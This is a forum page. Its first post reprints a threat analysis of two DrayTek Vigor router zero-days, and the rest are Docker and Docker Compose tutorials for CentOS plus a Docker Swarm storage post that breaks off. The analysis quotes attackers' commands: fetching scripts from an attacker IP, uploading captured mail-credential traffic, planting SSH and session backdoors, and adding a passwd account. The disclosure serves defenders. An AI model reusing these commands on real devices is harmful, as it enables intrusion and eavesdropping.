Men in Black

Administrator

Last active 1 hour ago

  1. 2 days ago
    Sat Mar 28 12:56:27 2020
    Men in Black started the conversation Two zero days are Targeting DrayTek Broadband CPE Devices.

    [attachment:5e7ee474dde24]

    Background

    From December 4, 2019, 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities of DrayTek[1] Vigor enterprise routers and switch devices to conduct a series of attacks, including eavesdropping on device’s network traffic, running SSH services on high ports, creating system backdoor accounts, and even creating a specific Malicious Web Session backdoor.

    On December 25, 2019, due to the highly malicious nature of the attack, we disclosed on Twitter[2] [3] the ongoing 0-day attack IoC without mentioning the vendor name or product lines. We also provided more details to some national CERTs.

    On February 10, 2020, the manufacturer DrayTek issued a security bulletin[4] , which fixed the vulnerability and released the latest firmware program 1.5.1. (here we actually have an easter egg we might talk about later)

    Vulnerability analysis

    With the help of 360 Firmware Total system [5] , we are able to perform vulnerability research . The two 0-day vulnerability command injection points are keyPath and rtick, located in the /www/cgi-bin/mainfunction.cgi, and the corresponding Web Server program is /usr/sbin/lighttpd.

    keyPath command injection vulnerability analysis

    Vulnerability type: unauthorized remote command execution vulnerability
    Vulnerability details: Two account password transmission methods are supported by the DrayTek devices, plain text and RSA encrypted transmission.
    For RSA encrypted transmission, the interaction logic is:

    1. The web front end uses the RSA public key to encrypt the username and password, and uses a keyPath field to specify the file suffix of the RSA private key to initiate a login request;
    2. When the formLogin() function in the /www/cgi-bin/mainfunction.cgi detects that the keyPath field is not empty, the decryption starts;
    3. formLogin() uses the keyPath as input to craft the following path /tmp/rsa/private_key_<keyPath> as the RSA private key;
    4. formLogin() performs Base64 decode on the username and password fields, writes them to the /tmp/rsa/binary_loginfile, and executes the following command to decrypt the username and password
       openssl rsautl -inkey '/tmp/rsa/private_key_<keyPath>' -decrypt -in /tmp/rsa/binary_login

    5. Finally, the formLogin() function takes the decrypted user name and password to continue the verification.

    The issue here is that keyPath does not have very strong input control, which makes unauthorized remote command execution possible.

    Bug fix: In version 1.5.1, keyPath sets the field length a limit of 30, and the content must be hexadecimal characters.

    [attachment:5e7ee59c05d34]

    rtick command injection vulnerability analysis

    Vulnerability Type: unauthorized remote command execution vulnerability
    Vulnerability details: When /www/cgi-bin/mainfunction.cgi needs to access verification code, it calls the function formCaptcha(), the function does not check the incoming timestamp from rtick, and calls /usr/sbin/captcha directly to generate <rtick>.gif the CAPTCHA image, which makes command injection possible.

    Bug fix: In version 1.5.1, the vendor limits the rtick field to use only [0-9].

    [attachment:5e7ee5d601177]

    Analysis of wild 0-day attacks

    Attack Group A

    1. Attacker A uses the keyPath command injection vulnerability to download and execute the http://103.82.143.51:58172/vig/tcpst1 script, and then further downloads and executes the following script.

    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1

    2. The script /etc/mailsend.sh is used to eavesdrop on all network interfaces on the DrayTek Vigor network device to listen on the ports 21, 25, 143, and 110. The tcpdump command /usr/sbin/tcpdump -i any -n -nn port 21 or port 25 or port 143 or port 110 -s 65535 -w /data/firewall.pcap & runs in the background, and a crontab is in place to upload the captured packets to https://103.82.143.51:58443/uploLSkciajUS.php every Monday, Wednesday, Friday at 0:00.

    Attack group B

    1. Attacker B uses the rtick command injection vulnerability to create 2 sets of Web Session backdoors that never expires in the file /var/session.json

    json -f /var/session.json set 7:CBZD1SOMBUHVAF34TPDGURT9RTMLRUDK username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json
    json -f /var/session.json set 7:R8GFPS6E705MEXZWVQ0IB1SM7JTRVE57 username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json

    2. Attacker B further creates SSH backdoors on TCP / 22335 and TCP / 32459;

    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 22335 | iptables -I PPTP_CTRL 1 -p tcp --dport 22335 -j ACCEPT
    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 32459 | iptables -I PPTP_CTRL 1 -p tcp --dport 32459 -j ACCEPT

    3. A system backdoor account wuwuhanhan:caonimuqin is added as well.

    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$3u34GCgO$9Pklx3.3OVwbIBja/CzZN/:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;
    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$sbIljOP5$vacGOLqYAXcw3LWek9aJQ.:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;

    Web Session backdoor

    When we study the 0-day PoC, we noticed that when the session parameter updatetime is set to 0, DrayTek Vigor network device never logs out unless the device is rebooted.
    (aka Auto-Logout: Disable)

    [attachment:5e7ee69e17857]

    Timeline

    2019/12/04 We discovered ongoing attacks using the DrayTek Vigor 0-day keyPath vulnerability
    2019/12/08 We reached out to a channel to report the vulnerability (but only later on found it did not work out)
    2019/12/25 We disclosed on twitter the IoC and provided more details to some national CERTs.
    2020/01/28 We discovered ongoing attacks using the DrayTek Vigor 0-day rtick vulnerability
    2020/02/01 MITRE published the CVE-2020-8515
    2020/02/10 DrayTek released a security bulletin and the latest firmware fix.

    Affected firmware list

    Vigor2960           <  v1.5.1
    Vigor300B           <  v1.5.1
    Vigor3900           <  v1.5.1
    VigorSwitch20P2121  <= v2.3.2
    VigorSwitch20G1280  <= v2.3.2
    VigorSwitch20P1280  <= v2.3.2
    VigorSwitch20G2280  <= v2.3.2
    VigorSwitch20P2280  <= v2.3.2

    Suggestions

    We recommend that DrayTek Vigor users check and update their firmwares in a timely manner, and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc on their systems.

    We recommend the following IoCs to be monitored and blocked on the networks where it is applicable.

    MD5

    7c42b66ef314c466c1e3ff6b35f134a4
    01946d5587c2774418b5a6c181199099
    d556aa48fa77040a03ab120b4157c007

    URL

    http://103.82.143.51:58172/vig/tcpst1
    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1
    https://103.82.143.51:58443/LSOCAISJDANSB.php
    https://103.82.143.51:58443/uploLSkciajUS.php

    Scanner IP

    103.82.143.51       	Korea                   ASN136209           	Korea Fast Networks 
    178.151.198.73      	Ukraine             	ASN13188            	Content Deli

    https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/

  2. 2 weeks ago
    Fri Mar 13 07:58:01 2020
    Men in Black started the conversation How To Install and Use Docker Compose on CentOS 7.

    [attachment:5e6ad832a0a85]

    Introduction

    Docker is a great tool for automating the deployment of Linux applications inside software containers, but to really take full advantage of its potential it’s best if each component of your application runs in its own container. For complex applications with a lot of components, orchestrating all the containers to start up and shut down together (not to mention talk to each other) can quickly become unwieldy.

    The Docker community came up with a popular solution called Fig, which allowed you to use a single YAML file to orchestrate all your Docker containers and configurations. This became so popular that the Docker team decided to make Docker Compose based on the Fig source, which is now deprecated. Docker Compose makes it easier for users to orchestrate the processes of Docker containers, including starting up, shutting down, and setting up intra-container linking and volumes.

    In this tutorial, you will install the latest version of Docker Compose to help you manage multi-container applications, and will explore the basic commands of the software.

    Docker and Docker Compose Concepts

    Using Docker Compose requires a combination of a bunch of different Docker concepts in one, so before we get started let’s take a minute to review the various concepts involved. If you’re already familiar with Docker concepts like volumes, links, and port forwarding then you might want to go ahead and skip on to the next section.

    Docker Images

    Each Docker container is a local instance of a Docker image. You can think of a Docker image as a complete Linux installation. Usually a minimal installation contains only the bare minimum of packages needed to run the image. These images use the kernel of the host system, but since they are running inside a Docker container and only see their own file system, it’s perfectly possible to run a distribution like CentOS on an Ubuntu host (or vice-versa).

    Most Docker images are distributed via the Docker Hub, which is maintained by the Docker team. Most popular open source projects have a corresponding image uploaded to the Docker Registry, which you can use to deploy the software. When possible, it’s best to grab “official” images, since they are guaranteed by the Docker team to follow Docker best practices.

    Communication Between Docker Images

    Docker containers are isolated from the host machine, meaning that by default the host machine has no access to the file system inside the Docker container, nor any means of communicating with it via the network. This can make configuring and working with the image running inside a Docker container difficult.

    Docker has three primary ways to work around this. The first and most common is to have Docker specify environment variables that will be set inside the Docker container. The code running inside the Docker container will then check the values of these environment variables on startup and use them to configure itself properly.

    Another commonly used method is a Docker data volume. Docker volumes come in two flavors — internal and shared.

    Specifying an internal volume just means that for a folder you specify for a particular Docker container, the data will be persisted when the container is removed. For example, if you wanted to make sure your log files persisted you might specify an internal /var/log volume.

    A shared volume maps a folder inside a Docker container onto a folder on the host machine. This allows you to easily share files between the Docker container and the host machine.

    The third way to communicate with a Docker container is via the network. Docker allows communication between different Docker containers via links, as well as port forwarding, allowing you to forward ports from inside the Docker container to ports on the host server. For example, you can create a link to allow your WordPress and MariaDB Docker containers to talk to each other and use port-forwarding to expose WordPress to the outside world so that users can connect to it.

    Prerequisites

    To follow this article, you will need the following:

    • CentOS 7 server, set up with a non-root user with sudo privileges

    Once these are in place, you will be ready to follow along.

    Step 1 — Installing Docker Compose

    In order to get the latest release, take the lead of the Docker docs and install Docker Compose from the binary in Docker’s GitHub repository.

    Check the current release and if necessary, update it in the command below:

        sudo curl -L "https://github.com/docker/compose/releases/download/1.23.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose

    Next, set the permissions to make the binary executable:

       sudo chmod +x /usr/local/bin/docker-compose

    Then, verify that the installation was successful by checking the version:

       docker-compose --version

    This will print out the version you installed:

    Output
    docker-compose version 1.23.2, build 1110ad01

    Now that you have Docker Compose installed, you’re ready to run a “Hello World” example.

    Step 2 — Running a Container with Docker Compose

    The public Docker registry, Docker Hub, includes a simple “Hello World” image for demonstration and testing. It illustrates the minimal configuration required to run a container using Docker Compose: a YAML file that calls a single image.

    First, create a directory for our YAML file:

       mkdir hello-world

    Then change into the directory:

       cd hello-world

    Now create the YAML file using your favorite text editor. This tutorial will use Vi:

       vi docker-compose.yml

    Enter insert mode, by pressing i, then put the following contents into the file:

    docker-compose.yml
    
    my-test:
      image: hello-world

    The first line will be part of the container name. The second line specifies which image to use to create the container. When you run the command docker-compose up it will look for a local image by the name specified, hello-world.

    With this in place, hit ESC to leave insert mode. Enter :x then ENTER to save and exit the file.

    To look manually at images on your system, use the docker images command:

        docker images

    When there are no local images at all, only the column headings display:

    Output
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE

    Now, while still in the ~/hello-world directory, execute the following command to create the container:

       docker-compose up

    The first time we run the command, if there’s no local image named hello-world, Docker Compose will pull it from the Docker Hub public repository:

    Output
    Pulling my-test (hello-world:)...
    latest: Pulling from library/hello-world
    1b930d010525: Pull complete
    . . .

    After pulling the image, docker-compose creates a container, attaches, and runs the hello program, which in turn confirms that the installation appears to be working:

    Output
    . . .
    Creating helloworld_my-test_1...
    Attaching to helloworld_my-test_1
    my-test_1 | 
    my-test_1 | Hello from Docker.
    my-test_1 | This message shows that your installation appears to be working correctly.
    my-test_1 | 
    . . .

    It will then print an explanation of what it did:

    Output
    . . .
    my-test_1  | To generate this message, Docker took the following steps:
    my-test_1  |  1. The Docker client contacted the Docker daemon.
    my-test_1  |  2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    my-test_1  |     (amd64)
    my-test_1  |  3. The Docker daemon created a new container from that image which runs the
    my-test_1  |     executable that produces the output you are currently reading.
    my-test_1  |  4. The Docker daemon streamed that output to the Docker client, which sent it
    my-test_1  |     to your terminal.
    . . .

    Docker containers only run as long as the command is active, so once hello finished running, the container stops. Consequently, when you look at active processes, the column headers will appear, but the hello-world container won’t be listed because it’s not running:

        docker ps
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES

    Use the -a flag to show all containers, not just the active ones:

        docker ps -a
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
    50a99a0beebd        hello-world         "/hello"            3 minutes ago       Exited (0) 3 minutes ago                       hello-world_my-test_1

    Now that you have tested out running a container, you can move on to exploring some of the basic Docker Compose commands.

    Step 3 — Learning Docker Compose Commands

    To get you started with Docker Compose, this section will go over the general commands that the docker-compose tool supports.

    The docker-compose command works on a per-directory basis. You can have multiple groups of Docker containers running on one machine — just make one directory for each container and one docker-compose.yml file for each directory.

    So far you’ve been running docker-compose up on your own, from which you can use CTRL-C to shut the container down. This allows debug messages to be displayed in the terminal window. This isn’t ideal though; when running in production it is more robust to have docker-compose act more like a service. One simple way to do this is to add the -d option when you up your session:

       docker-compose up -d

    docker-compose will now fork to the background.

    To show your group of Docker containers (both stopped and currently running), use the following command:

       docker-compose ps -a

    If a container is stopped, the State will be listed as Exited, as shown in the following example:

    Output
            Name            Command   State    Ports
    ------------------------------------------------
    hello-world_my-test_1   /hello    Exit 0        

    A running container will show Up:

    Output
         Name              Command          State        Ports      
    ---------------------------------------------------------------
    nginx_nginx_1   nginx -g daemon off;   Up      443/tcp, 80/tcp 

    To stop all running Docker containers for an application group, issue the following command in the same directory as the docker-compose.yml file that you used to start the Docker group:

       docker-compose stop

    Note: docker-compose kill is also available if you need to shut things down more forcefully.

    In some cases, Docker containers will store their old information in an internal volume. If you want to start from scratch you can use the rm command to fully delete all the containers that make up your container group:

    docker-compose rm

    If you try any of these commands from a directory other than the directory that contains a Docker container and .yml file, it will return an error:

    Output
    ERROR:
            Can't find a suitable configuration file in this directory or any
            parent. Are you in the right directory?
    
            Supported filenames: docker-compose.yml, docker-compose.yaml

    This section has covered the basics of how to manipulate containers with Docker Compose. If you needed to gain greater control over your containers, you could access the filesystem of the Docker container and work from a command prompt inside your container, a process that is described in the next section.

    Step 4 — Accessing the Docker Container Filesystem

    In order to work on the command prompt inside a container and access its filesystem, you can use the docker exec command.

    The “Hello World” example exits after it runs, so to test out docker exec, start a container that will keep running. For the purposes of this tutorial, use the Nginx image from Docker Hub.

    Create a new directory named nginx and move into it:

        mkdir ~/nginx
        cd ~/nginx

    Next, make a docker-compose.yml file in your new directory and open it in a text editor:

       vi docker-compose.yml

    Next, add the following lines to the file:

    [b]~/nginx/docker-compose.yml[/b]
    
    nginx:
      image: nginx

    Save the file and exit. Start the Nginx container as a background process with the following command:

       docker-compose up -d

    Docker Compose will download the Nginx image and the container will start in the background.

    Now you will need the CONTAINER ID for the container. List all of the containers that are running with the following command:

       docker ps

    You will see something similar to the following:

    Output of `docker ps`
    CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
    b86b6699714c        nginx               "nginx -g 'daemon of…"   20 seconds ago      Up 19 seconds       80/tcp              nginx_nginx_1

    If you wanted to make a change to the filesystem inside this container, you’d take its ID (in this example b86b6699714c) and use docker exec to start a shell inside the container:

       docker exec -it b86b6699714c /bin/bash

    The -t option opens up a terminal, and the -i option makes it interactive. /bin/bash opens a bash shell to the running container.

    You will then see a bash prompt for the container similar to:

    root@b86b6699714c:/#

    From here, you can work from the command prompt inside your container. Keep in mind, however, that unless you are in a directory that is saved as part of a data volume, your changes will disappear as soon as the container is restarted. Also, remember that most Docker images are created with very minimal Linux installs, so some of the command line utilities and tools you are used to may not be present.

  3. Fri Mar 13 07:43:52 2020
    Men in Black started the conversation How To Install and Use Docker on CentOS 7.

    Introduction

    Docker is an application that makes it simple and easy to run application processes in a container, which are like virtual machines, only more portable, more resource-friendly, and more dependent on the host operating system. For a detailed introduction to the different components of a Docker container, check out The Docker Ecosystem: An Introduction to Common Components.

    There are two methods for installing Docker on CentOS 7. One method involves installing it on an existing installation of the operating system. The other involves spinning up a server with a tool called Docker Machine that auto-installs Docker on it.

    In this tutorial, you’ll learn how to install and use it on an existing installation of CentOS 7.

    Prerequisites

    • 64-bit CentOS 7 Droplet
    • Non-root user with sudo privileges. A CentOS 7 server set up using Initial Setup Guide for CentOS 7 explains how to set this up.

    Note: Docker requires a 64-bit version of CentOS 7 as well as a kernel version equal to or greater than 3.10. The default 64-bit CentOS 7 Droplet meets these requirements.

    All the commands in this tutorial should be run as a non-root user. If root access is required for the command, it will be preceded by sudo. Initial Setup Guide for CentOS 7 explains how to add users and give them sudo access.

    Step 1 — Installing Docker

    The Docker installation package available in the official CentOS 7 repository may not be the latest version. To get the latest and greatest version, install Docker from the official Docker repository. This section shows you how to do just that.

    But first, let’s update the package database:
    Now run this command. It will add the official Docker repository, download the latest version of Docker, and install it:

       curl -fsSL https://get.docker.com/ | sh

    After installation has completed, start the Docker daemon:

       sudo systemctl start docker

    Verify that it’s running:

       sudo systemctl status docker

    The output should be similar to the following, showing that the service is active and running:

    Output
    ‚óŹ docker.service - Docker Application Container Engine
       Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor preset: enabled)
       Active: active (running) since Sun 2016-05-01 06:53:52 CDT; 1 weeks 3 days ago
         Docs: https://docs.docker.com
     Main PID: 749 (docker)

    Lastly, make sure it starts at every server reboot:

       sudo systemctl enable docker

    Installing Docker now gives you not just the Docker service (daemon) but also the docker command line utility, or the Docker client. We’ll explore how to use the docker command later in this tutorial.

    Step 2 — Executing Docker Command Without Sudo (Optional)

    By default, running the docker command requires root privileges — that is, you have to prefix the command with sudo. It can also be run by a user in the docker group, which is automatically created during the installation of Docker. If you attempt to run the docker command without prefixing it with sudo or without being in the docker group, you’ll get an output like this:

    Output
    docker: Cannot connect to the Docker daemon. Is the docker daemon running on this host?.
    See 'docker run --help'.

    If you want to avoid typing sudo whenever you run the docker command, add your username to the docker group:

       sudo usermod -aG docker $(whoami)

    You will need to log out of the Droplet and back in as the same user to enable this change.

    If you need to add a user to the docker group that you’re not logged in as, declare that username explicitly using:

       sudo usermod -aG docker username

    The rest of this article assumes you are running the docker command as a user in the docker user group. If you choose not to, please prepend the commands with sudo.

    Step 3 — Using the Docker Command

    With Docker installed and working, now’s the time to become familiar with the command line utility. Using docker consists of passing it a chain of options and subcommands followed by arguments. The syntax takes this form:

       docker [option] [command] [arguments]

    To view all available subcommands, type:

       docker

    As of Docker 1.11.1, the complete list of available subcommands includes:

    Output
        attach    Attach to a running container
        build     Build an image from a Dockerfile
        commit    Create a new image from a container's changes
        cp        Copy files/folders between a container and the local filesystem
        create    Create a new container
        diff      Inspect changes on a container's filesystem
        events    Get real time events from the server
        exec      Run a command in a running container
        export    Export a container's filesystem as a tar archive
        history   Show the history of an image
        images    List images
        import    Import the contents from a tarball to create a filesystem image
        info      Display system-wide information
        inspect   Return low-level information on a container or image
        kill      Kill a running container
        load      Load an image from a tar archive or STDIN
        login     Log in to a Docker registry
        logout    Log out from a Docker registry
        logs      Fetch the logs of a container
        network   Manage Docker networks
        pause     Pause all processes within a container
        port      List port mappings or a specific mapping for the CONTAINER
        ps        List containers
        pull      Pull an image or a repository from a registry
        push      Push an image or a repository to a registry
        rename    Rename a container
        restart   Restart a container
        rm        Remove one or more containers
        rmi       Remove one or more images
        run       Run a command in a new container
        save      Save one or more images to a tar archive
        search    Search the Docker Hub for images
        start     Start one or more stopped containers
        stats     Display a live stream of container(s) resource usage statistics
        stop      Stop a running container
        tag       Tag an image into a repository
        top       Display the running processes of a container
        unpause   Unpause all processes within a container
        update    Update configuration of one or more containers
        version   Show the Docker version information
        volume    Manage Docker volumes
        wait      Block until a container stops, then print its exit code

    To view the switches available to a specific command, type:

       docker docker-subcommand --help

    To view system-wide information, use:

       docker info

    Step 4 — Working with Docker Images

    Docker containers are run from Docker images. By default, it pulls these images from Docker Hub, a Docker registry managed by Docker, the company behind the Docker project. Anybody can build and host their Docker images on Docker Hub, so most applications and Linux distributions you’ll need to run Docker containers have images that are hosted on Docker Hub.

    To check whether you can access and download images from Docker Hub, type:

       docker run hello-world

    The output, which should include the following, should indicate that Docker in working correctly:

    Output
    Hello from Docker.
    This message shows that your installation appears to be working correctly.
    ...

    You can search for images available on Docker Hub by using the docker command with the search subcommand. For example, to search for the CentOS image, type:

       docker search centos

    The script will crawl Docker Hub and return a listing of all images whose name match the search string. In this case, the output will be similar to this:

    Output
    NAME                            DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
    centos                          The official build of CentOS.                   2224      [OK]       
    jdeathe/centos-ssh              CentOS-6 6.7 x86_64 / CentOS-7 7.2.1511 x8...   22                   [OK]
    jdeathe/centos-ssh-apache-php   CentOS-6 6.7 x86_64 / Apache / PHP / PHP M...   17                   [OK]
    million12/centos-supervisor     Base CentOS-7 with supervisord launcher, h...   11                   [OK]
    nimmis/java-centos              This is docker images of CentOS 7 with dif...   10                   [OK]
    torusware/speedus-centos        Always updated official CentOS docker imag...   8                    [OK]
    nickistre/centos-lamp           LAMP on centos setup                            3                    [OK]
    
    ...

    In the OFFICIAL column, OK indicates an image built and supported by the company behind the project. Once you’ve identifed the image that you would like to use, you can download it to your computer using the pull subcommand, like so:

       docker pull centos

    After an image has been downloaded, you may then run a container using the downloaded image with the run subcommand. If an image has not been downloaded when docker is executed with the run subcommand, the Docker client will first download the image, then run a container using it:

       docker run centos

    To see the images that have been downloaded to your computer, type:

       docker images

    The output should look similar to the following:

    [secondary_lable Output]
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    centos              latest              778a53015523        5 weeks ago         196.7 MB
    hello-world         latest              94df4f0ce8a4        2 weeks ago         967 B

    As you’ll see later in this tutorial, images that you use to run containers can be modified and used to generate new images, which may then be uploaded (pushed is the technical term) to Docker Hub or other Docker registries.

    Step 5 — Running a Docker Container

    The hello-world container you ran in the previous step is an example of a container that runs and exits, after emitting a test message. Containers, however, can be much more useful than that, and they can be interactive. After all, they are similar to virtual machines, only more resource-friendly.

    As an example, let’s run a container using the latest image of CentOS. The combination of the -i and -t switches gives you interactive shell access into the container:

       docker run -it centos

    Your command prompt should change to reflect the fact that you’re now working inside the container and should take this form:

    Output
    [root@59839a1b7de2 /]#

    Important: Note the container id in the command prompt. In the above example, it is 59839a1b7de2.

    Now you may run any command inside the container. For example, let’s install MariaDB server in the running container. No need to prefix any command with sudo, because you’re operating inside the container with root privileges:

       yum install mariadb-server

    Step 6 — Committing Changes in a Container to a Docker Image

    When you start up a Docker image, you can create, modify, and delete files just like you can with a virtual machine. The changes that you make will only apply to that container. You can start and stop it, but once you destroy it with the docker rm command, the changes will be lost for good.

    This section shows you how to save the state of a container as a new Docker image.

    After installing MariaDB server inside the CentOS container, you now have a container running off an image, but the container is different from the image you used to create it.

    To save the state of the container as a new image, first exit from it:

       exit

    Then commit the changes to a new Docker image instance using the following command. The -m switch is for the commit message that helps you and others know what changes you made, while -a is used to specify the author. The container ID is the one you noted earlier in the tutorial when you started the interactive docker session. Unless you created additional repositories on Docker Hub, the repository is usually your Docker Hub username:

       docker commit -m "What did you do to the image" -a "Author Name" container-id repository/new_image_name

    For example:

       docker commit -m "added mariadb-server" -a "Sunday Ogwu-Chinuwa" 59839a1b7de2 finid/centos-mariadb

    Note: When you commit an image, the new image is saved locally, that is, on your computer. Later in this tutorial, you’ll learn how to push an image to a Docker registry like Docker Hub so that it may be assessed and used by you and others.

    After that operation has completed, listing the Docker images now on your computer should show the new image, as well as the old one that it was derived from:

       docker images

    The output should be of this sort:

    Output
    REPOSITORY             TAG                 IMAGE ID            CREATED             SIZE
    finid/centos-mariadb   latest              23390430ec73        6 seconds ago       424.6 MB
    centos                 latest              778a53015523        5 weeks ago         196.7 MB
    hello-world            latest              94df4f0ce8a4        2 weeks ago         967 B

    In the above example, centos-mariadb is the new image, which was derived from the existing CentOS image from Docker Hub. The size difference reflects the changes that were made. And in this example, the change was that MariaDB server was installed. So next time you need to run a container using CentOS with MariaDB server pre-installed, you can just use the new image. Images may also be built from what’s called a Dockerfile. But that’s a very involved process that’s well outside the scope of this article. We’ll explore that in a future article.

    Step 7 — Listing Docker Containers

    After using Docker for a while, you’ll have many active (running) and inactive containers on your computer. To view the active ones, use:

       docker ps

    You will see output similar to the following:

    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
    f7c79cc556dd        centos              "/bin/bash"         3 hours ago         Up 3 hours                              silly_spence

    To view all containers — active and inactive, pass it the -a switch:

       docker ps -a

    To view the latest container you created, pass it the -l switch:

    docker ps -l

    Stopping a running or active container is as simple as typing:

       docker stop container-id

    The container-id can be found in the output from the docker ps command.

    Step 8 — Pushing Docker Images to a Docker Repository

    The next logical step after creating a new image from an existing image is to share it with a select few of your friends, the whole world on Docker Hub, or other Docker registry that you have access to. To push an image to Docker Hub or any other Docker registry, you must have an account there.

    This section shows you how to push a Docker image to Docker Hub.

    To create an account on Docker Hub, register at Docker Hub. Afterwards, to push your image, first log into Docker Hub. You’ll be prompted to authenticate:

       docker login -u docker-registry-username

    If you specified the correct password, authentication should succeed. Then you may push your own image using:

       docker push docker-registry-username/docker-image-name

    It will take sometime to complete, and when completed, the output will be of this sort:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    670194edfaf5: Pushed 
    5f70bf18a086: Mounted from library/centos 
    6a6c96337be1: Mounted from library/centos
    
    ...

    After pushing an image to a registry, it should be listed on your account’s dashboard, like that show in the image below.

    [attachment:5e6ad7111abcb]

    If a push attempt results in an error of this sort, then you likely did not log in:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    e3fbbfb44187: Preparing
    5f70bf18a086: Preparing
    a3b5c80a4eba: Preparing
    7f18b442972b: Preparing
    3ce512daaf78: Preparing
    7aae4540b42d: Waiting
    unauthorized: authentication required

    Log in, then repeat the push attempt.

  4. 3 weeks ago
    Fri Mar 6 22:00:16 2020
    Men in Black started the conversation Docker Swarm Persistent Storage.

    Unless you’ve been living under a rock, you should need no explanation what Docker is. Using Docker over the last year has drastically improved my deployment ease and with coupled with GitLab’s CI/CD has made deployment extremely ease. Mind you, not all our applications being deployed have the same requirements, some are extremely simple and others are extraordinarily complex. So when we start a new project we have a base docker build to begin from and based on the applications requirements we add/remove as needed.

    A little about Docker Swarm

    For the large majority of most of our applications, having a volume associated with the deployed containers and storing information is the database fits the applications needs.

    In front of all our applications we used to use Docker Flow Proxy to quickly integrate our application into our deployed environment and assign it a subdomain based on it’s service. For a few months we experienced issues with the proxy hanging up, resources not being cleared, and lots of dropped connections. Since than I have rebuilt our docker infrastructure and now we use Traefik for our proxy routing and it has been absolutely amazing! It’s extremely fast, very robust and extensible, and easy to manipulate to fit your needs. Heck before even deploying it I was using docker-compose to build a local network proxy to ensure it was what we needed. While Traefik was running in compose I was hitting domains such as http://whoami.localhost/ and this was a great way to learn the basic configuration before pushing it into a staging/production swarm environment. (That explaing how we got started with Traefik is a whole other post of it’s own.)

    Now back to our docker swarm, I know the big thing right now is Kubernetes . But every organization has their specific needs, for their different environments, application, types, and deployment mechanisms. In my opinion the current docker environment we’ve got running right now is pretty robust. We’ve got dozens of nodes, a number of deployment environments (cybersec, staging, and production), dozens of applications running at once, and some of then requiring a number of services in order to function properly.

    A few of the things that won me over on the docker swarm in the first place is it’s load balancing capabilities, it’s very fault-tolerant, and the self-healing mechanism that it uses in case a container crashes, a node locks up or drops, or a number of other issues. (We’ve had a number of servers go down due to networking issues or a rack server crapping out and with the docker swarm running you could never even tel we were having issues as an end user to our applications.)

    (Below is an image showing traffic hitting the swarm. If you have an application replicated upon deployment, traffic will be distributed amongst the nodes to prevent bottle necks.)

    -image-

    Why would you need persistent storage?

    Since the majority of our applications are data orientated, (with most of them hitting several databases in a single request) we hadn’t really had to worry about persistent storage. This is because once we deployed the applications; their volumes held all of their required assets and any data they needed was fetched from the database.

    The easiest way to explain volumes, is when a container is deployed to a node (if specified) it will put aside a section of storage specifically for that container. For example say we have an application called DogTracker the was deployed on node A and B. This application can create and store files in their volumes on those nodes. But what happens when there’s an issue with the container on node A and the container cycles to node C? The data created by the container is left in the volume on node A an no longer available, until that applications container cycles back to node A.

    And from this arises the problem we began to face. We were starting to develop applications that were starting to require files to be shared amongst each other. We also have numerous applications that require files to be saved and distributed without them being dumped into the database as a blob. And these files were required to be available without cycling volumes and/or dumping them into the containers during build time. And because of this, we needed to be able to have some form of persistent and distributed file storage across our containers.

    (Below is an image showing how a docker swarms volumes are oriented)

    -image-

    How we got around this!

    Now in this day an age there’s got to be ways to get around this. There’s at least 101 ways to do just about anything and it doesn’t always have to be newest shiniest toy everyone’s using. I know saying this while using Docker is kind of a hypocritical statement, but shared file systems have been around for decades. You’ve been able to mount network drives, ftp drives, have organizational based shared folders, the list can go on for days.

    But the big question is, how do we get a container to mount a local shared folder or distribute volumes across all swarm nodes? Well, there’s a whole list of distributed filesystems and modern storage mechanisms in the docker documentation . Below is a list of the top recommended alternatives I found for distributed file systems or NFS’s for the docker stratosphere around container development.

    I know you’re wondering why we didn’t use S3 , DigitalOcean Spaces , GCS , or some other cloud storage. But internally we have a finite amount of resources and we can spin up VM’s and be rolling in a matter of moments. Especially considering we have build a number of Ansible playbooks to quickly provision our servers. Plus, why throw resources out on the cloud, when it’s not needed. Especially when we can metaphorically create our own network based file system and have our own cloud based storage system.

    (Below is an image showing we want to distribute file system changes)

    -image-

    After looking at several methods I settled on GlusterFS a scalable network filesystem. Don’t get me wrong, a number of the other alternatives are pretty ground breaking and some amazing work as been put into developing them. But I don’t have thousands of dollars to drop on setting up a network file system, that may or may not work for our needs. There were also several others that I did look pretty heavily into, such as StorageOS and Ceph . With StorageOS I really liked the idea of a container based file system that stores, synchronizing, and distributes files to all other storage nodes within the swarm. And it may just be me, but Ceph looked like the prime competitor to Gluster. They both have their high points and seem to work very reliable. But at the time; it wasn’t for me and after using Gluster for a few months, I believe that I made the right choice and it’s served it’s purpose well.

    [attachment:5e6268fd50592]

    Gluster Notes

    (Note: The following steps are to be used on a Debian/Ubuntu based install.)

